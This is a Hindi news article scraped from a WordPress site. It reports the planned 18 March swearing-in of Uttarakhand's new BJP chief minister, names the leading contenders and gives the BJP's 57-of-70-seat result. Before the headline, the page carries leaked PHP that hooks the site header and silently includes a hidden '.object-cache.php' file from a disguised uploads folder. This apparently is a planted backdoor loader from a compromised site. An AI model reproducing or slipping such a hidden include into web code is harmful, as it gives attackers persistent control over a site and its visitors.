add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 18 मार्च को नया सीएम लेगा शपथ, पीएम मोदी और अमित शाह भी रहेंगे मौजूद – SOCH INDIA
Menu

राजनीति
18 मार्च को नया सीएम लेगा शपथ, पीएम मोदी और अमित शाह भी रहेंगे मौजूद

nobanner

उत्तराखंड में बीजेपी की शानदार जीत के बाद नए मुख्यमंत्री को परसों यानी 18 मार्च को शपथ दिलाई जाएगी. इस मौके पर प्रधानमंत्री नरेंद्र मोदी, बीजेपी अध्यक्ष अमित समेत तमाम बड़े नेता मौजूद रहेंगे.

शपथ ग्रहण समारोह दोपहर 3 बजे शुरू होगा. प्रदेश बीजेपी के अध्यक्ष अजय भट्ट के मुताबिक नए मुख्यमंत्री का नाम अब तक तय नहीं है. अजय भटट् ने भट्ट ने बताया कि उत्तराखंड के सभी नवनिर्वाचित बीजेपी विधायकों को निर्देश दिए गए हैं कि वे 17 व 18 मार्च को देहरादून में रहें. मुख्यमंत्री कौन होगा ? इस सवाल पर अजय भट्ट ने कहा कि कोई बीजेपी कार्यकर्ता ही सीएम बनेगा.

कौन कौन सीएम रेस में ?
1- सीएम की सबसे मज़बूत दावेदारी त्रिवेंद्र सिंह रावत की है. रावत अमित शाह की टीम में राष्ट्रीय सचिव भी है. अगर उत्तराखंड में संघ का दखल रहा, तो त्रिवेंद्र रावत को राज्य का अगला मुख्यमंत्री बनाया जा सकता है.

2- मुख्यमंत्री पद की होड़ में पिथौरागढ़ से बीजेपी विधायक प्रकाश पंत भी हैं. वो प्रदेश में पार्टी का ब्राह्मण चेहरा भी है. सूत्रों के मुताबिक, नेता भगत सिंह कोश्यारी ने प्रकाश पंत का नाम सुझाया है.

3- कांग्रेस से बगावत कर 2014 में बीजेपी में शामिल हुए सतपाल महाराज भी सीएम की रेस में शामिल हैं. सतपाल महाराज ने चौबट्टाखाल सीट से चुनाव जीता है. उन्हें राज्य बीजेपी के पूर्व अध्यक्ष तीरथ सिंह रावत की जगह उम्मीदवार बनाया गया था. वो कांग्रेस से लोकसभा सांसद भी रह चुके हैं.

बीजेपी को मिला है बहुमत
11 मार्च को आए नतीजों में बीजेपी को राज्य में बहुमत मिला है. कुल 70 सीटों में बीजेपी के खाते में 57 सीटें आई हैं. वहीं दूसरे नंबर पर रही कांग्रेस को महज 11 सीटें मिलीं. दो सीटें अन्य के खाते में गईं.